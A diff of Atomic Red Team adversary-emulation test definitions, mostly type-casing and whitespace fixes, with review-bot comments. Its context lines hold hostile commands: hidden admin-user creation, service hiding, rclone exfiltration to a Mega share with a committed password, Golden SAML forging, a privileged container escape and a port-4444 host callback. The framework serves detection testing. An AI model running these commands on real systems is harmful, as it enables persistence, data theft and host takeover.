 virtualbox_installer:
 description: Executable for the Virtualbox installer
- type: String
+ type: string
 default: VirtualBox-6.1.32-149290-Win.exe
 dependency_executor_name: powershell
 dependencies:
@@ -120,20 +120,20 @@ atomic_tests: https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/ https://attack.mitre.org/techniques/T1564/006/ supported_platforms: - - windows + - windows input_arguments: vm_name: description: Name of the new virtual machine - type: String + type: string default: Atomic VM dependencies: - - description: | - Hyper-V must be enabled on the system - Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart - prereq_command: | - if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = "Enabled") {exit 0} else {exit 1} - get_prereq_command: | - Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force + - description: | + Hyper-V must be enabled on the system + Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart + prereq_command: | + if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State = "Enabled") {exit 0} else {exit 1} + get_prereq_command: | + Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -Force executor: name: powershell elevation_required: true diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 9465e9b3..378b36f9 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -5,7 +5,7 @@ atomic_tests: auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a description: | This module extracts a binary (calc.exe) from inside of another binary. - + In the wild maldoc authors will use this technique to hide binaries inside of files stored within the office document itself. An example of this technique can be seen in sample 
@@ -41,22 +41,22 @@ atomic_tests: name: powershell - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 - description: Creating a user with a username containing "$" + description: Creating a user with a username containing "$" supported_platforms: - windows executor: name: command_prompt - elevation_required: true + elevation_required: true command: net user $ ATOMIC123! /add /active:yes cleanup_command: net user $ /DELETE 2>&1 -- name: Create an "Administrator " user (with a space on the end) +- name: Create an "Administrator " user (with a space on the end) auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c description: Creating a user with a username containing with a space on the end supported_platforms: - windows executor: name: powershell - elevation_required: true + elevation_required: true command: New-LocalUser -Name "Administrator " -NoPassword cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null - name: Create and Hide a Service with sc.exe @@ -65,7 +65,7 @@ atomic_tests: The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query. Upon successful execution, sc.exe creates a new service changes the security descriptor. - + https://twitter.com/Alh4zr3d/status/1580925761996828672 https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format supported_platforms: @@ -73,11 +73,11 @@ atomic_tests: input_arguments: service_name: description: Name of service to create - type: String + type: string default: AtomicService executable_command: description: Command to execute as a service - type: String + type: string default: 'C:\Windows\System32\calc.exe' executor: command: | @@ -86,4 +86,4 @@ atomic_tests: cleanup_command: | sc.exe delete #{service_name} name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true 
diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml
index 454e4e78..8315c31e 100644
--- a/atomics/T1566.001/T1566.001.yaml
+++ b/atomics/T1566.001/T1566.001.yaml
@@ -28,11 +28,11 @@ atomic_tests:
 jse_path:
 description: |
 Path for the macro to write out the "malicious" .jse file
- type: String
+ type: string
 default: C:\Users\Public\art.jse
 ms_product:
 description: Maldoc application Word or Excel
- type: String
+ type: string
 default: Word
 dependency_executor_name: powershell
 dependencies:
diff --git a/atomics/T1567.002/T1567.002.yaml b/atomics/T1567.002/T1567.002.yaml
index e57ca355..fc34da89 100644
--- a/atomics/T1567.002/T1567.002.yaml
+++ b/atomics/T1567.002/T1567.002.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 input_arguments:
 rclone_path:
 description: Directory of rclone.exe
- type: Path
+ type: path
 default: $env:temp\T1567.002\rclone-v*\
 rclone_config_path:
 description: Path to rclone's config file (default should be fine)
@@ -19,19 +19,19 @@ atomic_tests:
 default: $env:appdata
 dir_to_copy:
 description: Directory to copy
- type: String
+ type: string
 default: $env:temp\T1567.002
 mega_user_account:
 description: Mega user account
- type: String
+ type: string
 default: atomictesting@outlook.com
 mega_user_password:
 description: Mega user password
- type: String
+ type: string
 default: vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA
 remote_share:
 description: Remote Mega share
- type: String
+ type: string
 default: T1567002
 dependency_executor_name: powershell
 dependencies:
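Review bot: In the `@@ -19,19 +19,19 @@` hunk of T1567.002.yaml the `mega_user_password` argument keeps a literal credential as its `default`, next to the account name in `mega_user_account`; retyping it to `string` leaves a real-looking secret committed to the repo, and the executor in the following hunk writes that value into `rclone.conf` in plaintext. Replace the default with an obviously invalid value such as `default: '<MEGA_PASSWORD_PLACEHOLDER>'` and say in the description that it must be supplied at run time. If the account is deliberately a shared throwaway, a comment stating that would stop the next reviewer from flagging it again.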
@@ -44,19 +44,19 @@ atomic_tests:
 Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force
 executor:
 command: |
- New-Item #{rclone_config_path}\rclone -ItemType directory
- New-Item #{rclone_config_path}\rclone\rclone.conf
- cd #{rclone_path}
- .\rclone.exe config create #{remote_share} mega
- set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
- .\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v
+ New-Item #{rclone_config_path}\rclone -ItemType directory
+ New-Item #{rclone_config_path}\rclone\rclone.conf
+ cd #{rclone_path}
+ .\rclone.exe config create #{remote_share} mega
+ set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
+ .\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v
 cleanup_command: |
- cd #{rclone_path}
- .\rclone.exe purge #{remote_share}:test
- .\rclone.exe config delete #{remote_share}:
- Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
- cd c:\
- Remove-Item $env:temp\rclone.zip
- Remove-Item $env:temp\T1567.002 -recurse -force
+ cd #{rclone_path}
+ .\rclone.exe purge #{remote_share}:test
+ .\rclone.exe config delete #{remote_share}:
+ Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
+ cd c:\
+ Remove-Item $env:temp\rclone.zip
+ Remove-Item $env:temp\T1567.002 -recurse -force
 name: powershell
 elevation_required: false
diff --git a/atomics/T1569.001/T1569.001.yaml b/atomics/T1569.001/T1569.001.yaml
index c214fbc9..11df555e 100644
--- a/atomics/T1569.001/T1569.001.yaml
+++ b/atomics/T1569.001/T1569.001.yaml
@@ -10,11 +10,11 @@ atomic_tests: input_arguments: executable_path: description: Path of the executable to run. - type: Path + type: path default: /System/Applications/Calculator.app/Contents/MacOS/Calculator label_name: description: Path of the executable to run. - type: String + type: string default: evil executor: command: | diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index fcaafe21..7e906f35 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -7,7 +7,7 @@ atomic_tests: Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt` - + [BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware) [Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware) supported_platforms: @@ -15,11 +15,11 @@ atomic_tests: input_arguments: service_name: description: Name of service to create - type: String + type: string default: ARTService executable_command: description: Command to execute as a service - type: String + type: string default: '%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt' executor: command: | @@ -42,19 +42,19 @@ atomic_tests: input_arguments: remote_host: description: Remote hostname or IP address - type: String + type: string default: localhost user_name: description: Username - type: String + type: string default: DOMAIN\Administrator password: description: Password - type: String + type: string default: P@ssw0rd1 psexec_exe: description: Path to PsExec - type: String + type: string default: C:\PSTools\PsExec.exe dependency_executor_name: powershell dependencies: 
@@ -82,23 +82,23 @@ atomic_tests:
 input_arguments:
 remote_host:
 description: Remote hostname or IP address
- type: String
+ type: string
 default: "127.0.0.1"
 username:
 description: Username
- type: String
+ type: string
 default: "Administrator"
 domain:
 description: Target domain
- type: String
+ type: string
 default: ""
 password:
 description: Password
- type: String
+ type: string
 default: "P@ssw0rd1"
 command:
 description: Command to execute in target computer
- type: String
+ type: string
 default: "whoami"
 dependency_executor_name: bash
 dependencies:
diff --git a/atomics/T1571/T1571.yaml b/atomics/T1571/T1571.yaml
index f0ad2640..d33dda52 100644
--- a/atomics/T1571/T1571.yaml
+++ b/atomics/T1571/T1571.yaml
@@ -11,11 +11,11 @@ atomic_tests:
 input_arguments:
 port:
 description: Specify uncommon port number
- type: String
+ type: string
 default: "8081"
 domain:
 description: Specify target hostname
- type: String
+ type: string
 default: google.com
 executor:
 command: |
@@ -31,11 +31,11 @@ atomic_tests:
 input_arguments:
 port:
 description: Specify uncommon port number
- type: String
+ type: string
 default: "8081"
 domain:
 description: Specify target hostname
- type: String
+ type: string
 default: google.com
 executor:
 command: |
diff --git a/atomics/T1572/T1572.yaml b/atomics/T1572/T1572.yaml
index 51013eeb..d1d4f0fe 100644
--- a/atomics/T1572/T1572.yaml
+++ b/atomics/T1572/T1572.yaml
@@ -12,23 +12,23 @@ atomic_tests:
 input_arguments:
 doh_server:
 description: Default DoH resolver
- type: String
+ type: string
 default: https://8.8.8.8/resolve
 query_type:
 description: DNS query type
- type: String
+ type: string
 default: TXT
 subdomain:
 description: Subdomain prepended to the domain name
- type: String
+ type: string
 default: atomicredteam
 query_volume:
 description: Number of DNS queries to send
- type: Integer
+ type: integer
 default: "1000"
 domain:
 description: Default domain to simulate against
- type: String
+ type: string
 default: 127.0.0.1.xip.io
 executor:
 command: |
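Review bot: In the T1572 `@@ -12,23 +12,23 @@` hunk `query_volume` becomes `type: integer` while its default stays the quoted string `default: "1000"`, so the declared type and the parsed YAML scalar disagree; the integer arguments in the next hunk of the same file (`runtime`, `c2_interval`, `c2_jitter`) use unquoted `default: 30` / `default: 20`. Pick one convention for integer defaults file-wide; the unquoted form `default: 1000` matches the siblings. Any tooling that validates `default` against `type` after parsing may treat this argument differently from the others.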
@@ -45,31 +45,31 @@ atomic_tests:
 input_arguments:
 doh_server:
 description: Default DoH resolver
- type: String
+ type: string
 default: https://8.8.8.8/resolve
 runtime:
 description: Time in minutes to run the simulation
- type: Integer
+ type: integer
 default: 30
 domain:
 description: Default domain to simulate against
- type: String
+ type: string
 default: 127.0.0.1.xip.io
 subdomain:
 description: Subdomain prepended to the domain name
- type: String
+ type: string
 default: atomicredteam
 query_type:
 description: DNS query type
- type: String
+ type: string
 default: TXT
 c2_interval:
 description: Seconds between C2 requests to the command and control server
- type: Integer
+ type: integer
 default: 30
 c2_jitter:
 description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests
- type: Integer
+ type: integer
 default: 20
 executor:
 command: |
@@ -87,19 +87,19 @@ atomic_tests:
 input_arguments:
 doh_server:
 description: Default DoH resolver
- type: String
+ type: string
 default: https://8.8.8.8/resolve
 query_type:
 description: DNS query type
- type: String
+ type: string
 default: TXT
 subdomain:
 description: Subdomain prepended to the domain name (should be 63 characters to test maximum length)
- type: String
+ type: string
 default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte
 domain:
 description: Default domain to simulate against
- type: String
+ type: string
 default: 127.0.0.1.xip.io
 executor:
 command: |
diff --git a/atomics/T1573/T1573.yaml b/atomics/T1573/T1573.yaml
index 4c94b199..4432f158 100644
--- a/atomics/T1573/T1573.yaml
+++ b/atomics/T1573/T1573.yaml
@@ -15,11 +15,11 @@ atomic_tests:
 input_arguments:
 server_ip:
 description: IP of the external server
- type: String
+ type: string
 default: 127.0.0.1
 server_port:
 description: The port to connect to on the external server
- type: String
+ type: string
 default: "443"
 executor:
 command: |
diff --git a/atomics/T1574.002/T1574.002.yaml b/atomics/T1574.002/T1574.002.yaml
index 0825dbf7..e2e3aae3 100644
--- a/atomics/T1574.002/T1574.002.yaml
+++ b/atomics/T1574.002/T1574.002.yaml
@@ -11,11 +11,11 @@ atomic_tests:
 input_arguments:
 process_name:
 description: Name of the created process
- type: String
+ type: string
 default: calculator.exe
 gup_executable:
 description: GUP is an open source signed binary used by Notepad++ for software updates
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1574.002\bin\GUP.exe
 dependency_executor_name: powershell
 dependencies:
@@ -42,11 +42,11 @@ atomic_tests:
 input_arguments:
 process_name:
 description: Name of the created process
- type: String
+ type: string
 default: calculator.exe
 preloader_dll:
 description: library for interfacing with the dotnet framework
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1574.002\bin\preloader.dll
 dependency_executor_name: powershell
 dependencies:
diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml
index 53973f96..8bb78621 100644
--- a/atomics/T1574.006/T1574.006.yaml
+++ b/atomics/T1574.006/T1574.006.yaml
@@ -12,11 +12,11 @@ atomic_tests:
 input_arguments:
 path_to_shared_library_source:
 description: Path to a shared library source code
- type: Path
+ type: path
 default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c
 path_to_shared_library:
 description: Path to a shared library object
- type: Path
+ type: path
 default: /tmp/T1574006.so
 dependency_executor_name: bash
 dependencies:
@@ -24,7 +24,7 @@ atomic_tests:
 The shared library must exist on disk at specified location (#{path_to_shared_library})
 prereq_command: |
 if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;
- get_prereq_command: |
+ get_prereq_command: |
 gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 executor:
 command: |
@@ -44,11 +44,11 @@ atomic_tests:
 input_arguments:
 path_to_shared_library_source:
 description: Path to a shared library source code
- type: Path
+ type: path
 default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c
 path_to_shared_library:
 description: Path to a shared library object
- type: Path
+ type: path
 default: /tmp/T1574006.so
 dependency_executor_name: bash
 dependencies:
@@ -71,15 +71,15 @@ atomic_tests:
 input_arguments:
 file_to_inject:
 description: Path of executable to be injected. Mostly works on non-apple default apps.
- type: Path
+ type: path
 default: /Applications/Firefox.app/Contents/MacOS/firefox
 source_file:
 description: Path of c source file
- type: Path
+ type: path
 default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
 dylib_file:
 description: Path of dylib file
- type: Path
+ type: path
 default: /tmp/T1574006MOS.dylib
 dependency_executor_name: bash
 dependencies:
diff --git a/atomics/T1574.008/T1574.008.yaml b/atomics/T1574.008/T1574.008.yaml
index e45f6b49..f011b95d 100644
--- a/atomics/T1574.008/T1574.008.yaml
+++ b/atomics/T1574.008/T1574.008.yaml
@@ -16,4 +16,4 @@ atomic_tests:
 cleanup_command: |
 Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore
 Stop-Process -Name "calculator"
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1574.009/T1574.009.yaml b/atomics/T1574.009/T1574.009.yaml
index 9af496da..d2372f38 100644
--- a/atomics/T1574.009/T1574.009.yaml
+++ b/atomics/T1574.009/T1574.009.yaml
@@ -12,7 +12,7 @@ atomic_tests:
 input_arguments:
 service_executable:
 description: Path of the executable used for the service and as the hijacked program.exe
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe
 executor:
 command: |
diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml
index 2d13e804..24c3eee6 100644
--- a/atomics/T1574.011/T1574.011.yaml
+++ b/atomics/T1574.011/T1574.011.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 input_arguments:
 weak_service_name:
 description: weak service check
- type: String
+ type: string
 default: weakservicename
 executor:
 command: |
@@ -27,15 +27,15 @@ atomic_tests:
 input_arguments:
 weak_service_name:
 description: weak service name
- type: String
+ type: string
 default: calcservice
 weak_service_path:
 description: weak service path
- type: String
+ type: string
 default: '%windir%\system32\win32calc.exe'
 malicious_service_path:
 description: malicious service path
- type: String
+ type: string
 default: '%windir%\system32\cmd.exe'
 dependency_executor_name: powershell
 dependencies:
diff --git a/atomics/T1574.012/T1574.012.yaml b/atomics/T1574.012/T1574.012.yaml
index eee257f7..d89e0172 100644
--- a/atomics/T1574.012/T1574.012.yaml
+++ b/atomics/T1574.012/T1574.012.yaml
@@ -16,11 +16,11 @@ atomic_tests:
 input_arguments:
 file_name:
 description: unmanaged profiler DLL
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
 clsid_guid:
 description: custom clsid guid
- type: String
+ type: string
 default: '{09108e71-974c-4010-89cb-acf471ae9e2c}'
 dependency_executor_name: powershell
 dependencies:
@@ -60,11 +60,11 @@ atomic_tests:
 input_arguments:
 file_name:
 description: unmanaged profiler DLL
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
 clsid_guid:
 description: custom clsid guid
- type: String
+ type: string
 default: '{09108e71-974c-4010-89cb-acf471ae9e2c}'
 dependency_executor_name: powershell
 dependencies:
@@ -98,11 +98,11 @@ atomic_tests:
 input_arguments:
 file_name:
 description: unamanged profiler DLL
- type: Path
+ type: path
 default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
 clsid_guid:
 description: custom clsid guid
- type: String
+ type: string
 default: '{09108e71-974c-4010-89cb-acf471ae9e2c}'
 dependency_executor_name: powershell
 dependencies:
@@ -123,4 +123,4 @@ atomic_tests:
 $env:COR_ENABLE_PROFILING = 0
 $env:COR_PROFILER = ''
 $env:COR_PROFILER_PATH = ''
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1606.002/T1606.002.yaml b/atomics/T1606.002/T1606.002.yaml
index cf94b9cd..948acc07 100644
--- a/atomics/T1606.002/T1606.002.yaml
+++ b/atomics/T1606.002/T1606.002.yaml
@@ -12,15 +12,15 @@ atomic_tests:
 input_arguments:
 certificate_path:
 description: Token signing certificate path. See T1552.004 to export it
- type: Path
+ type: path
 default: '.\ADFS_signing.pfx'
 immutable_id:
 description: ImmutableId of the targeted user. It can be obtained with AzureAD powershell module; $(Get-AzureADUser -SearchString "username").ImmutableId
- type: String
+ type: string
 default: "aehgdqBTZV50DKQZmNJ8mg=="
 issuer_uri:
 description: Issuer URI of the ADFS service
- type: String
+ type: string
 default: "http://contoso.com/adfs/services/trust/"
 dependency_executor_name: powershell
 dependencies:
@@ -38,4 +38,3 @@ atomic_tests:
 if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" }
 Write-Host "End of Golden SAML"
 name: powershell
-
diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml
index 297d33c2..ddb32441 100644
--- a/atomics/T1609/T1609.yaml
+++ b/atomics/T1609/T1609.yaml
@@ -10,11 +10,11 @@ atomic_tests:
 input_arguments:
 namespace:
 description: K8s namespace to use
- type: String
+ type: string
 default: default
 command:
 description: Command to run
- type: String
+ type: string
 default: uname
 dependencies:
 - description: |
@@ -37,11 +37,11 @@ atomic_tests: Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts. supported_platforms: - - containers + - containers input_arguments: command: description: Command to run - type: String + type: string default: cat dependencies: - description: | @@ -60,4 +60,3 @@ atomic_tests: docker rmi -f t1609:latest name: bash elevation_required: false - diff --git a/atomics/T1611/T1611.yaml b/atomics/T1611/T1611.yaml index 764b9621..45fd52fd 100644 --- a/atomics/T1611/T1611.yaml +++ b/atomics/T1611/T1611.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1611 display_name: "Escape to Host" @@ -13,21 +12,21 @@ atomic_tests: - https://securekubernetes.com/scenario_2_attack/ supported_platforms: - containers - + dependency_executor_name: sh - dependencies: + dependencies: - description: Verify docker is installed. prereq_command: | which docker get_prereq_command: | if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - + - description: Verify docker service is running. prereq_command: | sudo systemctl status docker get_prereq_command: | sudo systemctl start docker - + - description: Verify kind is in the path. prereq_command: | which kind 
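Review bot: The `@@ -1,4 +1,3 @@` hunk of T1611.yaml removes the `---` document-start marker together with the whitespace cleanup, which in the hunks visible here is the only place this commit changes something other than type casing, indentation and trailing whitespace. The marker is harmless and yamllint's `document-start` rule expects it, so keep the first line as `---` unless the repository's convention is to omit it everywhere.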
@@ -35,13 +34,13 @@ atomic_tests: curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind mv kind /usr/bin/kind - + - description: Verify kind-atomic-cluster is created prereq_command: | sudo kind get clusters get_prereq_command: | sudo kind create cluster --name atomic-cluster - + - description: Verify kubectl is in path prereq_command: | which kubectl @@ -49,7 +48,7 @@ atomic_tests: curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl mv kubectl /usr/bin/kubectl - + executor: command: | kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' @@ -69,32 +68,32 @@ atomic_tests: input_arguments: mount_device: description: Path to the device of the host's disk to mount - type: Path + type: path default: /dev/dm-0 mount_point: description: Path where the host filesystem will be mounted - type: Path + type: path default: /mnt/T1611.002 cron_path: description: Path on the host filesystem where cron jobs are stored - type: Path + type: path default: /etc/cron.d cron_filename: description: Filename of the cron job in cron_path - type: String + type: string default: T1611_002 listen_address: description: IP address to listen for callback from the host system. - type: String + type: string default: "`ifconfig eth0 | grep inet | awk '{print $2}'`" listen_port: description: TCP Port to listen on for callback from the host system. - type: String + type: string default: 4444 dependency_executor_name: sh diff --git a/atomics/T1615/T1615.yaml b/atomics/T1615/T1615.yaml index 189c43a0..e3e5b535 100644 --- a/atomics/T1615/T1615.yaml +++ b/atomics/T1615/T1615.yaml 
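Review bot: In the `@@ -69,32 +68,32 @@` hunk `listen_port` is retyped to `string` but its `default: 4444` is an unquoted scalar that YAML parses as an integer, whereas the port arguments this commit touches in T1571 and T1573 are quoted (`default: "8081"`, `default: "443"`). Quote it, `default: "4444"`, so the parsed value matches the declared type. The hunk header announces 32 lines a side but only 26 are visible here, so the tail of this hunk may be cut off in this view.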
@@ -10,7 +10,7 @@ atomic_tests:
 https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
 Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
 supported_platforms:
- - windows
+ - windows
 executor:
 name: command_prompt
 elevation_required: false
@@ -56,7 +56,7 @@ atomic_tests:
 input_arguments:
 gpo_output:
 description: The output of the Get-GPO cmdlet
- type: String
+ type: string
 default: $env:temp\GPO_Output.txt
 gpo_param:
 description: You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter